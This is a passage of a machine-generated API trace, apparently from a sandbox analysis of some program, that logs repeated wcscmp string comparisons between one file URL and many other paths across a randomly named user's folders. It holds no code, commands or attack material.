(_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/yzvsri7wb0.pdf") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/nnkxqyu2c.bmp") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/cvm_.jpg") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/uwefm1na-dsdirw%20v7.bmp") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/saeibjk2.odp") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/pjm8g%20hd0vdm.docx") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/jbjbayjalmaqe.jpg") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/p0mmc6mktcpt8jz.ots") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/xqiysgiqzh.swf") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/shcj2ukhha9e2.png") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/0ivkoykeh0-af8.png") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/zwfvn9iebk6wzpag.mkv") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/v0ufl0ag.flv") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/a3ne_yxum0cld.csv") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/6fshffojtwspry33.ppt") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/hby7gwij.doc") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/uhtkq-tczvm9tdvxvw.flv") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/28laxbsq3m50.jpg") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/xcj9p.jpg") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/gxv2c5bzmuai647pclru.xlsx") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/w5qvdpae9jrz.pdf") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/kvgo2ps.odt") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lu_nzwrgi2ssxtfhhhg.swf") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/c9v5cwhsfounz.png") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/g5ve1ybcahauz0t.gif") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/3sc0z1bfbrlsq.ppt") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ohxnykh_ufz4.gif") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/2n_gtpylh.odt") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/dc0kkkmref9xs.swf") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bbuhdsebor_wx0_ly.flv") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/neiwqsqwjb.docx") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/i-vzxxaq.ppt") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/s%201xjks5rgwiostrv.flv") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ie86ieikrrj2tctdthln.flv") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cthtm1stuuxwdzgs.swf") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/keqrajwwgkvsr.bmp") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/xad6dacxjlfsnkrl.mkv") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9zd4.pptx") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/uprrnkocaj.swf") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/ycpzmkirbkzdd83zh.pps") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bgq5sdc_j4q1pn3g.mkv") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/meivqh73.jpg") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/kfcaijye4jotjfgcvvz.docx") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/v8zjpd1uv_.bmp") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/7ulx.jpg") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/kpuzfgcfs9u.swf") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/olv5jdb-ffdifmwqcs.docx") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/rnvh3h9ck0e39pnq.pdf") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/mik5.xlsx") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/zqr7exbiokjx.mkv") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/gvvprgs0c.png") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/bqip4gzdrig20x.png") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/imjmunevalj.bmp") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/kqayysruimuhur.gif") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/vw6xls.xlsx") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9wzlbboc.xlsx") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qu7qixvgbko.swf") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/8ep2zuetsnplh6gpu01.ots") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/j-fqx8oz1.flv") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/hkofn.rtf") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4-pa3_vg9kycz2coo.swf") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/dxixxj.gif") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/qcjka57cosu3vmhw1m.flv") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/6itn%20raypy3k4dh-lrq.bmp") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/khv7bwlacmmomab9eeg.odt") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/duzlmllyi_us.flv") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/auhiftr.pdf") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/9u1awhjmofi.gif") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7qgdkajlv%20ov0mtf.pptx") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/y7ykwwplwltoj6hk%20z.pptx") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/oz2_mrsbrizc.xlsx") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/cs9dbb0db.pps") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7ogjb-qe0l0.rtf") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/thsn5kdbg.jpg") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/yfxu1rpal7.bmp") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/_5xg3ier-feuapuc9w9.odp") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/lpldj8us8y.ods") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/u9ror.flv") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/jnes3c.rtf") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/nonghmvfyp69p.pptx") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ityxkmicvrin0btq.gif") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/paszghjjdktqmq.png") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/atbj.png") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/n0tkysumll.odt") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/frpgv.pptx") returned 1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/wal.gif") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/49gdy95-0c.mkv") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/gyuix6ohet.swf") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/zh5or54.jpg") returned -1 [0085.790] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/6ajwk7gtt_t6-1wj3g.odp") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/abd4adf.doc") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/cwmce43u6a.png") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", 